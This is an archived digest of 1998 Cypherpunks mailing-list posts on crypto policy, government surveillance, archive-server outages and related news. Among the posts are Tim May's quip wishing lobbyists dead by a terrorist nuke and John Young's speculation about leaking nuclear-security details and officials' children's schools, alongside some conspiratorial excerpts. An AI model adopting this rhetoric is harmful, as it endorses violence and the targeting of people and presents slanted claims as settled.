In-Reply-To: <tw790jw2am5.fsf@denmark-vesey.MIT.EDU>
Message-ID: <v0313030ab219b7376d3b@[209.66.100.36]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:41 AM -0700 9/7/98, Ryan Lackey wrote:

>The machine suffered either disk controller or HDD problems as I was
>logged into it.  It is located in Boston, MA.  I do not currently have
>a way of getting to the machine to repair it, and this will likely
>continue to be true, so until I can get one of the people I know at
>the site where the machine is located to fix it, the archives will be
>offline.  If the machine cannot be fixed, I will put the archive up
>elsewhere.  I believe hugh@toad.com copied the entire archive at some
>point, so that might be helpful.
>
>Sorry about this -- replicated servers are always a good idea.

Indeed, weren't you developing some kind of distributed eternity server? So
much for eternity, I guess.

Ryan, could you tell us what you are working on, and what has taken you out
of the country?

--Tim May

"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 8 Sep 1998 00:31:30 +0800
To: John Young <cypherpunks@cyberpass.net
Subject: Re: What we are Fighting
In-Reply-To: <Pine.GSO.3.95.980907064846.7404C-100000@well.com>
Message-ID: <v0313030bb219b85ab18e@[209.66.100.36]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:39 AM -0700 9/7/98, John Young wrote:
>It would be fitting for this list to be distinguished as
>the place where crypto-in-a-crime was first committed.
>
>What might that be? A match of the crime committed
>to prevent widespread strong crypto?
>
>Crypto-criminal anonymity in the national interest (governmental
>secrecy) fighting to prevent crypto-criminal anonymity in the
>public interest (private secrecy).
>
>This is not a troll, but query on what could be done to to tip the
>hand and identify those unnamed who are most fearful of strong
>cryptography, not their public rougers in the 3 divs of gov.

Well, there are just so many things that are now called "crimes" in these
Beknighted States, that it's really a matter of what the Authorities decide
to prosecute.

For example, do they prosecute J. Random Cypherpunk for his support of the
freedom fighters of Hezbollah, which is on the State Department's list of
"terror"-supporting organizations? (Meaning that citizen-unit sheeple are
breaking the law if they provide any financial or technical support to
Hezbollah.) If they prosecute J. Random Cypherpunk, and can show he used
PGP to send messages to the freedom fighters, or even supplied them with a
copy of PGP....

Or how about the religious organization known as Aum Shinretsu. Apparently
I am breaking a U.S. law by tithing to the Aum religion, as it is also on
this list.

And then there are those RICO laws. Arranging cutout organizations to let
foreign nationals consult and write code is probably a violation of various
laws.

I can think of lots of "crimes" in the eyes of the burrowcrats that many of
us are committing constantly.

However, "crypto in a crime" has not become law yet. And if we can keep
those pesky "civil rights" lobbyists in D.C. neutralized, maybe it never
will be. With any luck, these curriers of favor are inside the fallout
pattern from Bin Laden's nuke.

--Tim May




"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Mon, 7 Sep 1998 21:47:53 +0800
To: cypherpunks@cyberpass.net
Subject: Re: What we are Fighting
Message-ID: <199809071345.JAA02136@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



[Cryptography Manifesto excerpts used for replies]

   >   From: John Young <jya@pipeline.com>
   >
   >   Tim asks:
   >
   >   >Freeh and Company continue to mumble about "meeting
   >   >the legitmate needs of law enforcement." What can they 
   >   >be speaking of?
   >   ...
   >   >Obviously his side is contemplating domestic crypto restrictions.
   >
   >   Threat of terrorism will be the impetus for applying national security 
   >   restrictions domestically, for relaxing cold war limitations on spying
   >   on Americans, for dissolving barriers between law enforcement
   >   and military/intelligence agencies.

Funny how the NSA's ECHELON monitoring machine keeps growing endlessly...

:   The Washington Post Magazine, June 23 1996
:   "Government surveillance, terrorism and the U.S. Constitution"
:   from Main Justice, by Jim McGee and Brian Duffy, 1996, ISBN 0-684-81135-9
:           
:   The FBI is growing in tandem with the NSA. With the help of the National
:   Security Agency, the U.S. eavesdropping bureaucracy that spans the globe,
:   the FBI operates a super-secret facility in New York code-named Megahut
:   that is linked to the other FBI listening posts.
: 
:   After the OKC bombing, Janet Reno and Louis Freeh asked Congress to raise
:   to 3,000 the number of FBI agents working counter-intelligence and counter-
:   terrorism.
: 
:   With the new legislation, the funding for just the FBI's counter-intelli-
:   gence/terror goals is now ONE BILLION DOLLARS a year, and their activities
:   will rise to a LEVEL HIGHER THAN AT ANY TIME DURING THE COLD WAR.  

1984 means a constant State of War.


Here's a new war: "cyberwar".

#  "Head of CIA Plans Center To Protect Federal Computers"
#  By Tim Weiner, The New York Times, 6/26/96
# 
#  John Deutch, Director of the CIA, is building a "cyberwar" center in the NSA.
#   
#  Mr. Deutch said cyberwar could become a 21st-century national security threat
#  second only to nuclear, biological and chemical weapons.
# 
#  "The electron," Mr. Deutch warned, "is the ultimate precision-guided weapon."

Haven't I heard bad dialogue like this on Mystery Science Theater 3000?

----

   >   From: John Young <jya@pipeline.com>
   >
   >   Technical means for access to encrypted data will probably
   >   come first in communications, then to stored material. There
   >   will be an agreement for increased CALEA wiretap funding, which 
   >   is what the two cellular and wired suits against the FBI intend,
   >   (paralleling what the hardware and software industries want from
   >   federal buyers of security products).
   >
   >   This will provide the infrastructural regime for the gov to monitor 
   >   and store domestic traffic as NSA does for the global, using the 
   >   same technology (NSA may provide service to domestic
   >   LEA as it now does for other gov customers for intel).

    
Question:  How can the FBI use computers to monitor thousands and thousands
           and thousands and thousands of phone calls simultaneously, as they
           said they would do with CALEA, when we Americans speak so many 
           different accents and languages?
    
Answer:    Thirty years of fine tuning by the NSA, y'all.

----

   >   From: John Young <jya@pipeline.com>
   >
   >   As noted here, the features will appear first as optional, in response
   >   to demand from commerce, from parents, from responsible
   >   institutions, to meet public calls for protection, for privacy, for
   >   combating threats to the American people. 

*   "Project L.U.C.I.D.", by Texe Marrs, 1996, ISBN 1-884302-02-5
*
*   These changes are necessary, we are reminded each day by our mind control
*   jailers in the media, to solve the immigration crises, to institute gun
*   control, to counter domestic terrorism, to fight pornography, to find
*   deadbeat dads who don't pay child support, to "Save Mother Earth",
*   to war against drug kingpins, to stop crime in the streets, to watch and
*   monitor the militias, to put an end to hate crimes and bigotry,
*   to extend universal healthcare benefits, to guarantee welfare reform, to
*   improve public education...the list of crises and problems to be fixed
*   seems to be never-ending.
*
*   Implement National ID Cards, they promise, and a bright, secure future
*   can be ours. [snip]

----

   >   From: John Young <jya@pipeline.com>
   >
   >   Like wiretap law, use of the features for preventative snooping will 
   >   initially require a court order, as provided in several of the crypto 
   >   legislative proposals.
   >
   >   Like the wiretap orders, gradually there will be no secret court refusals 
   >   for requests to use the technology in the national interest.
   >
   >   Personal privacy will evaporate almost unnoticeably...

    *      *      *      *      *      *      *      *      *      *
    *      *      *      *      *      *      *      *      *      *
  * * *  * * *  * * *  * * *  * * *  * * *  * * *  * * *  * * *  * * *
   ***    ***    ***    ***    ***    ***    ***    ***    ***    ***
    *      *      *      *      *      *      *      *      *      *
: The Puzzle Palace
:     Inside the National Security Agency,
:     America's most secret intelligence organization
: Author James Bamford, 1983 revision, ISBN 0-14-00.6748-5

P468-469: Within the United States, FISA still leaves the NSA free to pull
into its massive vacuum cleaner every telephone call and message entering,
leaving, OR TRANSITING the country.

By carefully inserting the words "by the National Security Agency" into the
FISA legislation, the NSA has skillfully excluded from the coverage of the
FISA statute as well as the surveillance court all interceptions received
from the British GCHQ or any other non-NSA source.

Thus it is possible for GCHQ to monitor the necessary domestic circuits  
and pass them on to the NSA through the UKUSA Agreement, giving them
impunity to target and watch-list Americans.

P475-477: Like an ever-widening sinkhole, the NSA's surveillance technology
will continue to expand, quietly pulling in more and more communications and
gradually eliminating more and more privacy.

If there are defenses to such technotyranny, it would appear, at least from
past experience, that they will not come from Congress.

Rather, they will most likely come from academe and industry in the form of
secure cryptographic applications to private and commercial telecommunications
equipment.

The same technology that is used against free speech can be used
to protect it, for without protection the future may be grim.


Senator Frank Church, chairman of the Senate Intelligence committee, referring
to the NSA's SIGINT technology, ciirca 1975:

    At the same time, that capability at any time could be turned around
    on the American people and no American would have any privacy left,
    such is the capability to monitor everything: telephone conversations,
    telegrams, it doesn't matter.

    There would be no place to hide.

    If the government ever became a tyranny, if a dictator ever took charge
    in this country, the technological capacity that the intelligence commun-
    ity has given the government could enable it to impose total tyranny,
    and there would be no way to fight back, because the most careful effort
    to combine together in resistance to the government, no matter how
    privately it was done, is within the reach of the government to know.

    Such is the capability of this technology...

    I don't want to see this country ever go across the bridge.

    I know the capacity that is there to make tyranny total in America, and
    we must see to it that this agency and all agencies that possess this
    technology operate within the law and under proper supervision, so that
    we never cross over that abyss.

    That is the abyss from which there is no return.

  
    *      *      *      *      *      *      *      *      *      *
   ***    ***    ***    ***    ***    ***    ***    ***    ***    ***
  * * *  * * *  * * *  * * *  * * *  * * *  * * *  * * *  * * *  * * *
    *      *      *      *      *      *      *      *      *      *
    *      *      *      *      *      *      *      *      *      *

*   "Data Show Federal Agents Seldom Employ Surveillance Authority Against
*   Terrorists", By Stephen Labaton, The New York Times, 5/1/95
*
*   An item in President Clinton's five-year, $1.5 billion plan to combat
*   terrorist acts:
*
*      o It would ease restrictions on the use in American courts of
*        information from surveillance conducted by foreign governments.


#   "Moynihan Says U.S. Killed His Anti-Spy Measure"
#   By Irvin Molotsky, The New York Times, September 11, 1985
#
#   Senator Daniel Patrick Moynihan charged that the CIA and State Department
#   had killed a measure he had introduced aimed at protecting American
#   citizens from having their telephone conversations intercepted by foreign
#   agents in this country.
#
#   The Senator's bill would have made telephone call interception by foreign
#   agents illegal and would have provided for their expulsion.
#
#   The Chairman of the Select Committee on Intelligence opposed the measure
#   as unnecessary and could lead to disclosing "sensitive intelligence
#   sources."

British wiretappers at the helm of the NSA's domestic spy-fest.

---guy

   http://www.newsguy.com/~mayday/crypto/crypto0.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Mon, 7 Sep 1998 21:53:29 +0800
To: cypherpunks@cyberpass.net
Subject: Re: KRAP is at it in the IETF
Message-ID: <199809071350.JAA02165@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



A reply already.
---guy

   >   From rgm@icsa.net Mon Sep  7 09:32:47 1998
   >   Received: from homebase.htt-consult.com (homebase.htt-consult.com [208.235.169.130])
   >   	by mail2.panix.com (8.8.8/8.8.8/PanixM1.3) with ESMTP id JAA04870
   >   	for <guy@panix.com>; Mon, 7 Sep 1998 09:32:45 -0400 (EDT)
   >   Received: from rgm ([208.235.169.131]) by homebase.htt-consult.com
   >             (Netscape Mail Server v2.02) with SMTP id AAA340
   >             for <guy@panix.com>; Mon, 7 Sep 1998 09:32:50 -0400
   >   Message-Id: <3.0.5.32.19980907092146.00a108c0@homebase.htt-consult.com>
   >   X-Sender: rgm-icsa@homebase.htt-consult.com
   >   X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32)
   >   Date: Mon, 07 Sep 1998 09:21:46 -0400
   >   To: Information Security <guy@panix.com>
   >   From: Robert Moskowitz <rgm@icsa.net>
   >   Subject: Re: KRAP is at it in the IETF
   >   In-Reply-To: <199809071253.IAA01912@panix7.panix.com>
   >   Mime-Version: 1.0
   >   Content-Type: text/plain; charset="us-ascii"
   >   Status: R
   >
   >   Note that this is an individual submission.  It is not the product of any
   >   IETF workgroup.  Anyone can submit an Internet Draft.  The IETF maintains
   >   an open process.  However, the IESG has to approve all IDs before they can
   >   become RFCs.  There will be a period of last call on this draft on the IETF
   >   list where appropriate comments will be taken.
   >   >
   >   Robert Moskowitz
   >   International Computer Security Association
   >   	(248) 968-9809
   >   Fax:	(248) 968-2824
   >   rgm@icsa.net
   >




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Mon, 7 Sep 1998 22:00:12 +0800
To: cypherpunks@cyberpass.net
Subject: Re: any relation?
Message-ID: <199809071357.JAA02175@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From: Steve Mynott <stevem@tightrope.demon.co.uk>
   >   X-Echelon: no-archive
Heh.
   >
   >   http://www.kiva.net/~tmay/

No, Cypherpunk Tim May's picture was shown in Wired...

But now he's gonna hafta get a gun at least that big,
or suffer major penis envy.

---guy ;-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Mon, 7 Sep 1998 17:04:09 +0800
To: cypherpunks@cyberpass.net
Subject: Re: IP: Encryption Expert Says U.S. Laws Led to Renouncing of   Citizenship
In-Reply-To: <v0401173cb2186ae5e832@[139.167.130.246]>
Message-ID: <35F3A0CC.37385749@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Robert Hettinga wrote:
> 
> Sameer Parekh, the president of the Web server company C2 Net, said:
> "I think it's essential if you want business that you're doing your
> development overseas. It's pretty clear to anyone internationally that
> anything exportable [from the United States] is a joke."

Let's wait and see whether AES will be genuinely exportable.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 7 Sep 1998 23:49:23 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Cypherpunks HyperArchive (fwd)
Message-ID: <199809071608.LAA03505@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: Cypherpunks HyperArchive
> From: Ryan Lackey <rdl@MIT.EDU>
> Date: 07 Sep 1998 11:41:54 -0400

> The machine suffered either disk controller or HDD problems as I was
> logged into it.  It is located in Boston, MA.  I do not currently have

The L0pht folks are there and Wel Pond used to be a subscriber. Perhaps you
could contact them and they could provide the support?


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Mon, 7 Sep 1998 17:25:46 +0800
To: jkthomson <jkthomson@bigfoot.com>
Subject: Re: request for [cdn] export laws.
In-Reply-To: <3.0.3.32.19980905160024.0070f7c0@dowco.com>
Message-ID: <35F3A435.4C8C4D26@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



jkthomson wrote:

> 
> I have been looking for the export restrictions (if any) that regulate
> canadian encryption products.  I have tried searching the net for a little

Perhaps the URL
  
     http://www.efc.ca/

is of some interest to you.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 7 Sep 1998 23:47:28 +0800
To: cypherpunks@cyberpass.net
Subject: Re: What we are Fighting
In-Reply-To: <v03130307b218f992deb9@[209.66.100.36]>
Message-ID: <199809071546.LAA21825@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



It would be fitting for this list to be distinguished as
the place where crypto-in-a-crime was first committed.

What might that be? A match of the crime committed
to prevent widespread strong crypto?

Crypto-criminal anonymity in the national interest (governmental
secrecy) fighting to prevent crypto-criminal anonymity in the 
public interest (private secrecy).

This is not a troll, but query on what could be done to to tip the 
hand and identify those unnamed who are most fearful of strong 
cryptography, not their public rougers in the 3 divs of gov.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@MIT.EDU>
Date: Mon, 7 Sep 1998 23:43:42 +0800
To: Matthew James Gering <mgering@ecosystems.net>
Subject: Re: Cypherpunks HyperArchive
Message-ID: <tw790jw2am5.fsf@denmark-vesey.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain



> There is another archive at http://sof.mit.edu/cypherpunks, ironically
> the machine that hosts it is not up at the moment

The machine suffered either disk controller or HDD problems as I was
logged into it.  It is located in Boston, MA.  I do not currently have
a way of getting to the machine to repair it, and this will likely
continue to be true, so until I can get one of the people I know at
the site where the machine is located to fix it, the archives will be
offline.  If the machine cannot be fixed, I will put the archive up
elsewhere.  I believe hugh@toad.com copied the entire archive at some
point, so that might be helpful.

Sorry about this -- replicated servers are always a good idea.
-- 
Ryan Lackey
rdl@mit.edu
http://sof.mit.edu/rdl/		




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 8 Sep 1998 00:26:50 +0800
To: users@EINSTEIN.ssz.com (SSZ User Mail List)
Subject: Seed to clone himself, one way or another [CNN]
Message-ID: <199809071643.LAA03831@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

It seems that scientist in general may soon be forced to roam from country
to country to practice their work.

Shades of Neuromancer. I am more and more convinced that Gibson's book, and
it's social commentary, is right on the mark.

Forwarded message:

> X-within-URL: http://www.cnn.com/TECH/science/9809/07/clone.seed.ap/

>           CHICAGO PHYSICIST SAYS HE'LL CLONE HIMSELF WITH WIFE'S HELP
>                                        
>    Dr. Richard Seed Richard Seed   September 7, 1998
>    Web posted at: 3:50 a.m. EDT (0750 GMT)
>    
>    BOSTON (AP) -- A physicist with three Harvard degrees but no medical
>    license said he is ready to begin the first step toward immortality:
>    he will clone himself.

[text deleted]

>    Seed said his wife, Gloria, has agreed to carry an embryo that would
>    be created by combining the nucleus of one of his cells with a donor
>    egg, the newspaper said.

[text deleted]

>    The Chicago scientist has three Harvard degrees, including a Ph.D.,
>    but no medical degree, no money and no institutional backing. He has
>    vowed to produce a pregnancy with a human clone within 2 1/2 years.

[text deleted]

>    Two states, California and Michigan, have outlawed human cloning and
>    dozens of other states are considering bans.
>    
>    A five-year moratorium on cloning is apparently being observed by
>    mainstream scientists, but Congress has failed to act on legislation
>    to outlaw the procedure.
>    
>    Seed has said that if Congress bans cloning, he will move his
>    operation to Tijuana, Mexico.

[text deleted]


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@MIT.EDU>
Date: Mon, 7 Sep 1998 23:50:27 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Archives? What archives?
Message-ID: <tw77lzf3oun.fsf@denmark-vesey.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Tim May <tcmay@got.net> writes:

> 
> At 1:44 AM -0700 9/4/98, Sparkes, Ian, ZFRD AC wrote:
> 
> >---- Facetious comment begin -----
> >At least now we know why people aren't following Tim's
> >advice to 'check the archives' before putting their feet in
> >their mouths.
> >---- Facetious comment end -----
> 
> Try http://www.inet-one.com/cypherpunks/
> 
> If the archives at some sites are going down, this could be for various
> reasons.
> 
> Being an assembly of mostly-anarchist-leaning folks, with no leadership, no
> organization, no hierarchy, and no procedures, there are no officially
> maintained archives.
> 
> What we have are what people choose to put up.
> 
> Someone was talking in the last half year about burning a CD-ROM with a big
> chunk of the archives on it. I haven't heard if this ever happened and if
> it was made available for sale. (It seems that about every year someone
> launches a project to generate such a CD-ROM, but I haven't seen the
> followthrough.)
> 
> --Tim May

I had an archive on sof.mit.edu, but shortly after I left Boston, MA, US
where the machine is located, the HDD on the machine (or the controller)
died, and I'm still trying to get one of my former housemates to repair it.

I'm currently in the wrong country to fix the drive, and don't expect to
be back.

I prepared the CD-ROMs for sale (I had a CD-R on the machine), and posted
several times offering to sell them, but no one ever actually sent me
the money.  Actually, a small number of people did, and I sold them, but
I don't remember who they were.

I also don't have particularly good backups of that machine.  I think
someone mirrored it at toad.com before it died, so they're probably not
lost forever.  I don't have a machine with free bandwidth from which
to host it, though, until sof.mit.edu is back on the net.  I may be
sending the HDD out to a drive recovery company anyway for the other
data on the drive.

This was an amateurish hobby server of mine, and not a production-grade
service, so people shouldn't complain too much that I didn't invest the
money in quality replication.
-- 
Ryan Lackey
rdl@mit.edu
http://sof.mit.edu/rdl/		




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 8 Sep 1998 00:52:58 +0800
To: users@EINSTEIN.ssz.com (SSZ User Mail List)
Subject: Government Regulation & Scienctific Research
Message-ID: <199809071711.MAA04033@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Because of the changes in national governments and their increasing desire
to regulate their citizenry and their economies according to flawed economic
and social dogma we will see the following:

- primary research will still occur in the 1st world countries where the
  interest, money, and infrastructure can support it.

- practical applications of this technology will be developed in the 3rd
  world countries where the destabalizing impact of technology won't hurt
  as much because the central government infrastructure doesn't exist.

- it will become harder and harder for individuals with intellectual
  capital to express their rights within these 1st world enclaves. In
  particular, leaving the country. Perhaps it will get so bad that we'll
  see a return to the Soviet style of sports competition (ie KGB stoolies
  following all the athletes around).

What will be the end result?

We'll see bastions of 1st world culture surrounded by a sea of balkan
areas that are 'governed' by economic and cultural ethos alone.

As this process proceeds it will erode the stability of the 1st world
countries and cause their break-up into small independant balkans.

The results of this will be:

- there will be a slow down in basic research in about 50 years because
  there won't be any large infrastructures that can support basic
  research. Hopefuly the balkans will find a way to cooperate in an
  economic and technological manner. If so the roll of technology will
  resume, albeit potentialy at a slower rate.

- small balkans will band together for periods of time to explore
  research and develop the base understanding.

it'll end up being sort of like a MCC or Sematech at the political level.

One aspect that does worry me is that as technology speads the cultures
around the world homogenize. This could have a negative impact on the
balkanization because the motive to go from here to there won't be relevant
because there will be here. It may turn out that xenophobic cultures like
the Talibans and Chinese may actualy help in the long run because of their
unwillingness to compromise their world views.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 8 Sep 1998 01:48:09 +0800
To: cypherpunks@cyberpass.net
Subject: Re: What we are Fighting
In-Reply-To: <199809071546.LAA21825@camel7.mindspring.com>
Message-ID: <199809071745.NAA09547@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



True that governmental dietary laws are immensely flexible 
when the dogs are hungry.

Given that moral and financial and political betrayal and treachery 
do not qualify for grave natsec threat, and only those acts which 
aim at snatching the very best technology for political control, it's 
the NBC toys that attract most of the serious searchers for terrorists 
under the global bed.

For crypto-in-a-crime that might mean sending here an encrypted
message with an explanatory note that it contains, say:

How to tell the difference between decoys and the real tranporters 
of nuclear components among the national labs and/or to Pantex 
for disassembly.

Or where the recovered Pu and triggers are stored in the TX 
panhandle, helpfully describing what's fake and what's not,
what the security plan is, not disinfo, what tools are needed to 
pick up emanations, how to weed the spoofs.

Or what and where BW or CW armaments are being refreshed,
repaired, deactivated, or invented in top secrecy just in case
some rogue violates a treaty, what tools are needed to sniff 
precursors, how to weed the spoofs, and how to avoid seeded 
soil in your backyard.

Or where key targeters of foreign terrorists live, their childrens' 
school, their favorite places to get away from the terrible
responsibility for USG assassination politics.

Or, could one encrypt a message to oneself claiming to
contain such information, post it here, see who wants
your heart and mind.

Or, create a PK pair, encrypt such a message, then post it,
both keys and PW here. Would the pacesetter be traced?

Would anyone notice, though? Would waiting for the disaster
be better strategy?

Thousands of threats pour in, State says, Secret Service says,
IC says, way too many to fully investigate, until one proves 
blessedly true, ah yes, the likely suspect, then marshal the 
targeters to cruise congress whispering look at this, to OK 
cleansweeping CDR, according to immensely flexible menus
long set.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: your name <your.name@pcm.bosch.de>
Date: Mon, 7 Sep 1998 20:05:28 +0800
To: fight-censorship@vorlon.mit.edu
Subject: Re: Child-Molesting Forger's Chilling Confession!!!1!
Message-ID: <199809071159.NAA05822@frnext1a.fr.bosch.de>
MIME-Version: 1.0
Content-Type: application/x-www-form-urlencoded

application/www-form-urlencoded


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Mynott <stevem@tightrope.demon.co.uk>
Date: Mon, 7 Sep 1998 21:07:13 +0800
To: cypherpunks@cyberpass.net
Subject: any relation?
Message-ID: <19980907140142.A6010@tightrope.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



http://www.kiva.net/~tmay/

-- 
pgp 1024/D9C69DF9 1997/10/14 steve mynott <steve@tightrope.demon.co.uk>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 8 Sep 1998 04:01:27 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Archives? What archives?
In-Reply-To: <tw77lzf3oun.fsf@denmark-vesey.MIT.EDU>
Message-ID: <v04011705b219d5cf7106@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:49 AM -0400 on 9/7/98, Ryan Lackey wrote:


> I'm currently in the wrong country to fix the drive, and don't expect to
> be back.

Here comes another American-African...

Cheers,
Bob Hettinga


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 8 Sep 1998 05:34:09 +0800
To: cypherpunks@cyberpass.net
Subject: clinton digital signing
Message-ID: <199809072131.OAA29302@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




------- Forwarded Message

Date: Sun, 6 Sep 1998 01:04:12 +1200
To: snetnews@world.std.com
From: "ScanThisNews" <mcdonalds@airnet.net> (by way of
 jeremy.compton@stonebow.otago.ac.nz (Jeremy Compton))
Subject: SNET: [FP] FW: Clinton "Useless" w/o Pen: Uses SmartCard Encrption


- ->  SNETNEWS  Mailing List

[Forwarded message]

Clinton "Useless" w/o Pen: Uses SmartCard Encrption

Source:  Fox News - AP
http://www.foxnews.com/js_index.sml?content=/news/wires2/

WHITE HOUSE NOTEBOOK: Clinton feels 'utterly useless' without his pen
 6.33 p.m. ET (2233 GMT) September 4, 1998

 By Shawn Pogatchnik, Associated Press

 DUBLIN, Ireland (AP) - What's the point of being president if you can't
use your pen?

 Seated at matching laptops, President Clinton and Irish Prime Minister
Bertie Ahern used "smart cards,'' personalized codes and digital readers
Friday to electronically affix their signatures to an electronic commerce
agreement.

 Clinton joked that he missed the old-fashioned way of approving deals.

 "Do you have any idea how much time I spend every day signing my name? I'm
going to feel utterly useless if I can't do that anymore,'' he said.

 He also offered this insight on being president: "You know, by the time
you become the leader of a country, someone else makes all the decisions.
You just sign your name.

 "You may find you can get away with virtual presidents, virtual prime
ministers, virtual everything. You know, just stick a little card in and
get the predictable response.''

<snip part about Clinton's golf game>

                  (c) 1998 Associated Press. All rights reserved.
- -----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
- -----------------------

- -----Original Message-----
From: believer@telepath.com [mailto:believer@telepath.com]
Sent: Saturday, September 05, 1998 6:09 PM
To: believer@telepath.com
Subject: Clinton "Useless" w/o Pen: Uses SmartCard Encrption



- -> Send "subscribe   snetnews " to majordomo@world.std.com
- ->  Posted by: "ScanThisNews" <mcdonalds@airnet.net> (by way of jeremy.compton@stonebow.otago.ac.nz (Jeremy Compton))


------- End of Forwarded Message




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 8 Sep 1998 05:43:48 +0800
To: Tim May <tcmay@got.net>
Subject: Re: What we are Fighting
In-Reply-To: <v03130308b219b1d32914@[209.66.100.36]>
Message-ID: <Pine.GSO.3.95.980907143754.17348A-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



We even make an illusion to Monica's Cigar in a story in this week's Time.
A Microsoft story I was working on died at the last moment, unfortunately.

As for the crypto bills, there is no comparable Senate bill. Certainly
this is not for lack of sponsors: Kyl and Feinstein would be glad to
introduce it, and Kyl chairs a relevant subcommittee. But they wanted to
see how far they'd get with McCain's bill, and now it's too late to do
much, as Tim said. 

-Declan


On Mon, 7 Sep 1998, Tim May wrote:

> At 6:53 AM -0700 9/7/98, Declan McCullagh wrote:
> 
> >There is, offically, a proposal on the table to limit speech within the
> >U.S. by restricting sale, manufacture, distribution, import of non-GAK'd
> >crypto. A House committee approved that one year ago.
> >
> 
> I'd forgotten about that little one. Of course, it has not gone anywhere
> (no Senate version or committee markup, right?), so I'm not yet ready to
> say there's official action on its way. And, fortunately, the session is
> over but for the shouting about Clinton and his cigars.
> 
> --Tim May
> 
